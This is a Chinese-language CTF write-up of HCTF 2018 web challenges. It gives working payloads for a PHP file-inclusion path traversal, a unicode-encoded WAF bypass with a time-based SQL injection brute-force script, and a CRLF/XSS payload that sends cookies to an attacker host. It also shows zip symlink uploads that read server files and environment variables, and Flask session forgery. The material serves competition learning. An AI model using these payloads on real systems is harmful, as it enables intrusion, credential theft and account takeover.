又是一年双十一,又是一年hctf,web狗写一下自己学到的,做出来的题目
Warmup 查看源代码在注释里发现source.php,访问得到index.php的代码。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 <?php class emmm { public static function checkFile (&$page ) { $whitelist = ["source" =>"source.php" ,"hint" =>"hint.php" ]; if (! isset ($page ) || !is_string ($page )) { echo "you can't see it" ; return false ; } if (in_array ($page , $whitelist )) { return true ; } $_page = mb_substr ( $page , 0 , mb_strpos ($page . '?' , '?' ) ); if (in_array ($_page , $whitelist )) { return true ; } $_page = urldecode ($page ); $_page = mb_substr ( $_page , 0 , mb_strpos ($_page . '?' , '?' ) ); if (in_array ($_page , $whitelist )) { return true ; } echo "you can't see it" ; return false ; } } if (! empty ($_REQUEST ['file' ]) && is_string ($_REQUEST ['file' ]) && emmm::checkFile ($_REQUEST ['file' ]) ) { include $_REQUEST ['file' ]; exit ; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />" ; } ?>
CVE-2018-12613 phpMyAdmin后台文件包含分析
paylaod:http://warmup.2018.hctf.io/index.php?file=hint.php%253f/../../../../../../ffffllllaaaagggg
flag:hctf{e8a73a09cfdd1c9a11cca29b2bf9796f}
kzone www.zip下载到源码,分析源码
在include/safe.php里找到了waf
1 $blacklist = '/union|ascii|mid|left|greatest|least|substr|sleep|or|benchmark|like|regexp|if|=|-|<|>|\#|\s/i' ;
在memeber.php里发现了json_decode()函数,json_decode()在解json格式的同时还会将unicode转码。利用unicode绕过waf,对login_data
注入。
payload:cookie:islogin=1;login_data={"admin_user":"\u0061\u0064\u006d\u0069\u006e\u0027\u0020\u0061\u006e\u0064\u0020\u0069\u0066\u0028\u0028\u0073\u0075\u0062\u0073\u0074\u0072\u0028\u0028\u0064\u0061\u0074\u0061\u0062\u0061\u0073\u0065\u0028\u0029\u0029\u002c\u0031\u002c\u0031\u0029\u003d\u0027\u0068\u0027\u0029\u002c\u0073\u006c\u0065\u0065\u0070\u0028\u0035\u0029\u002c\u0031\u0029\u0023","admin_password":"123"}
直接上timesql的脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests,time,stringdef unicode (s ): unis = '' for i in s: unis += '\u00' +i.encode("hex" ) return unis url = "http://kzone.2018.hctf.io/admin/index.php" dic = "hctf{}1234567890qweryuiopasdgjklzxvbnm" flag = '' for i in range (1 ,40 ): for c in dic: payload = "admin' and if((substr((select binary F1a9 from F1444g),%d,1)='%s'),sleep(5),1)#" % (i,c) payload = unicode(payload) cookies = { "islogin" :"1" , "login_data" :'{"admin_user":"' +payload+'","admin_pass":"123"}' } time_start = time.time() c = requests.get(url=url,cookies=cookies).content time_end = time.time() if time_end - time_start >= 5 : flag += c print flag break
flag:hctf{4526a8cbd741b3f790f95ad32c2514b9}
admin github下载源码
还是unicode的用法
unicode安全
注册ᴬdmin
strlower()可以将ᴬ
变为A
,再登陆修改密码A
变为a
flag:hctf{un1c0dE_cHe4t_1s_FuNnying}
bottle Bottle HTTP 头注入漏洞,找到了离别歌师傅的博客
Bottle HTTP 头注入漏洞探究
payload:http://bottle.2018.hctf.io/path?path=http://bottle.2018.hctf.io:22/user%0AX-XSS-Protection:0%0A%0A%3Cscript%3Elocation.href=
http://ip/xss/index.php?a=`%2bdocument.cookie%3C/script%3E`
hide and seek 上传zip,利用软连接读取文件
1 2 ln -s xxx xxx zip -y xxx.zip xxx
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 /etc/nginx/nginx.conf user nginx; worker_processes auto; error_log /var/log/nginx/error.log warn; pid /var/run/nginx.pid; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /var/log/nginx/access.log main; sendfile on; #tcp_nopush on; keepalive_timeout 65; #gzip on; include /etc/nginx/conf.d/*.conf; } daemon off; /etc/nginx/conf.d/nginx.conf server { listen 80; location / { try_files $uri @app; } location @app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } } /etc/uwsgi/uwsgi.ini [uwsgi] socket = /tmp/uwsgi.sock chown-socket = nginx:nginx chmod-socket = 664 # Graceful shutdown on SIGTERM, see https://github.com/unbit/uwsgi/issues/849#issuecomment-118869386 hook-master-start = unix_signal:15 gracefully_kill_them_all /proc/self/environ UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgi SUPERVISOR_GROUP_NAME=uwsgi HOSTNAME=7d8beb1a9aa4 SHLVL=0 PYTHON_PIP_VERSION=18.1 HOME=/root GPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DU WSGI_INI=/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini NGINX_MAX_UPLOAD=0 UWSGI_PROCESSES=16 STATIC_URL=/static UWSGI_CHEAPER=2 NGINX_VERSION=1.13.12-1~stretch PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin NJS_VERSION=1.13.12.0.2.0-1~stretch LANG=C.UTF-8 SUPERVISOR_ENABLED=1 PYTHON_VERSION=3.6.6 NGINX_WORKER_PROCESSES=auto SUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sock SUPERVISOR_PROCESS_NAME=uwsgiLISTEN_PORT=80STATIC_INDEX=0 PWD=/app/hard_t0_guess_n9f5a95b5ku9fgSTATIC_ PATH=/app/static PYTHONPATH=/app UWSGI_RELOADS=0 /app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini [uwsgi] module = hard_t0_guess_n9f5a95b5ku9fg.hard_t0_guess_also_df45v48ytj9_main callable=app
然后读取源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 from flask import Flask,session,render_template,redirect, url_for, escape, request,Responseimport uuidimport base64import randomimport flagfrom werkzeug.utils import secure_filenameimport osrandom.seed(uuid.getnode()) app = Flask(__name__) app.config['SECRET_KEY' ] = str (random.random()*100 ) app.config['UPLOAD_FOLDER' ] = './uploads' app.config['MAX_CONTENT_LENGTH' ] = 100 * 1024 ALLOWED_EXTENSIONS = set (['zip' ]) def allowed_file (filename ): return '.' in filename and \ filename.rsplit('.' , 1 )[1 ].lower() in ALLOWED_EXTENSIONS @app.route('/' , methods=['GET' ] ) def index (): error = request.args.get('error' , '' ) if (error == '1' ): session.pop('username' , None ) return render_template('index.html' , forbidden=1 ) if 'username' in session: return render_template('index.html' , user=session['username' ], flag=flag.flag) else : return render_template('index.html' ) @app.route('/login' , methods=['POST' ] ) def login (): username=request.form['username' ] password=request.form['password' ] if request.method == 'POST' and username != '' and password != '' : if (username == 'admin' ): return redirect(url_for('index' ,error=1 )) session['username' ] = username return redirect(url_for('index' )) @app.route('/logout' , methods=['GET' ] ) def logout (): session.pop('username' , None ) return redirect(url_for('index' )) @app.route('/upload' , methods=['POST' ] ) def upload_file (): if 'the_file' not in request.files: return redirect(url_for('index' )) file = request.files['the_file' ] if file.filename == '' : return redirect(url_for('index' )) if file and allowed_file(file.filename): filename = secure_filename(file.filename) file_save_path = os.path.join(app.config['UPLOAD_FOLDER' ], filename) if (os.path.exists(file_save_path)): return 'This file already exists' file.save(file_save_path) else : return 'This file is not a zipfile' try : extract_path = file_save_path + '_' os.system('unzip -n ' + file_save_path + ' -d ' + extract_path) read_obj = os.popen('cat ' + extract_path + '/*' ) file = read_obj.read() read_obj.close() os.system('rm -rf ' + extract_path) except Exception as e: file = None os.remove(file_save_path) if (file != None ): if (file.find(base64.b64dcode('aGN0Zg==' ).decode('utf-8' )) != -1 ): return redirect(url_for('index' , error=1 )) return Response(file) if __name__ == '__main__' : app.run(host='127.0.0.1' , debug=True , port=10008 )
SECRET_KEY中的随机数种子是uuid.getnode()
的值,可以通过读取/sys/class/net/eth0/address
mac地址获得
伪造admin的cookie
1 2 3 4 5 6 7 8 9 10 11 12 from flask import session,Flaskimport randomrandom.seed(20015589129314 ) app = Flask(__name__) app.config['SECRET_KEY' ] = str (random.random()*100 ) @app.route('/' , methods=['GET' ] ) def index (): session['username' ]='admin' return "123" app.run(host='127.0.0.1' , debug=True , port=10008 )
flag:hctf{2495e2ef667b367a0738f5eae9d6afb983c2}